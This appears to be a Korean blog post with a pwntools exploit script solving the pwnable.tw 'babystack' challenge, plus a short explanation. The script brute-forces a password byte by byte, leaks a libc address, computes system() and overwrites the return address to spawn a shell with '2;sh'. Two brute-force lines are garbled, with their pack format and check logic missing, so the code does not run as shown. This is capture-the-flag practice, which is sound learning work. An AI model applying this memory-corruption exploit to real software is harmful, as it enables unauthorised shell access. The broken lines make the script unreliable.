pwnable.tw babystack 본문
from pwn import *
#s = remote('chall.pwnable.tw', 10205)
# Spawn the challenge binary locally with the bundled libc preloaded; the
# commented-out remote() line above is the live-target variant it replaced.
s = process('./babystack',env={'LD_PRELOAD':'./libc_64.so.6'})
# Both start empty and are presumably grown byte by byte in the loops below
# (the appends themselves are not visible in this listing).
password = ''
libc_leak = ''
def input_passwd(passwd):
    """Pick menu item 1, send *passwd* raw, and return the reply up to the first '!'.

    Uses the module-level connection ``s``; ``passwd`` is sent with send(), not
    sendline(), so no newline is appended. The prompt text (including its typo)
    is the binary's own output and is matched verbatim.
    """
    menu_choice = '1'
    s.recvuntil('>> ')
    s.sendline(menu_choice)
    s.recvuntil('Your passowrd :')
    s.send(passwd)
    reply = s.recvuntil('!')
    return reply
def cp(data):
    """Pick menu item 3 and send *data* raw at the ' :' prompt.

    Uses the module-level connection ``s``. Returns None; any response after
    the send is left unread for the caller.
    """
    menu_choice = '3'
    s.recvuntil('>> ')
    s.sendline(menu_choice)
    s.recvuntil(' :')
    s.send(data)
# --- Stage 1: recover the stored password one byte at a time (16 bytes max).
# NOTE(review): line 21 is damaged by extraction -- struct.pack('> ') is not a
# valid format string; everything between a '<' and the following '>' (the pack
# format, the result check and the append to `password`) was apparently
# stripped as if it were an HTML tag. This stage cannot run as listed.
for i in range(0, 16):
for j in range(1, 0x100):
b = input_passwd(password + struct.pack('> ')
s.sendline('1')
break
# Submit the recovered password NUL-terminated and padded to 0x48 bytes,
# then issue one copy of 24 filler bytes and re-select item 1.
input_passwd((password + '\x00').ljust(0x48, 'a'))
cp('b'*24)
s.sendline('1')
# --- Stage 2: recover 6 bytes of a libc pointer with the same loop shape.
# NOTE(review): line 29 is truncated exactly like line 21; the append to
# `libc_leak` is not visible here either.
for a in range(0, 6):
for c in range(1, 0x100):
b = input_passwd('a'*8 + libc_leak + struct.pack('> ')
s.sendline('1')
break
# Zero-extend the 6 leaked bytes to a full 8-byte little-endian value.
libc_leak = u64(libc_leak + '\x00\x00')
# These two offsets are constants of the bundled libc_64.so.6 loaded via
# LD_PRELOAD above; presumably read from that specific build -- TODO confirm.
libc_base = libc_leak - 0x78439
system = libc_base + 0x45390
log.info('libc_leak : ' + hex(libc_leak))
log.info('libc_base : ' + hex(libc_base))
log.info('system : ' + hex(system))
# Final buffer: 8 zero bytes, 0x38 filler, the recovered password, 0x18 filler,
# then the computed system address (layout explained by the comments below).
payload = p64(0)
payload += 'c'*0x38
payload += password
payload += 'd'*0x18
payload += p64(system)
input_passwd(payload)
cp('A'*8)
s.sendline('2;sh\x00')
#make padding
#cover return addr
#2;/bin/sh\x00
s.interactive()
스택 피보팅 해주면서 strncmp로 패스워드와 libc leak. strcpy 이후 피보팅되어서 select를 가리키니까 rdi에 2;sh\x00 들어가고 get shell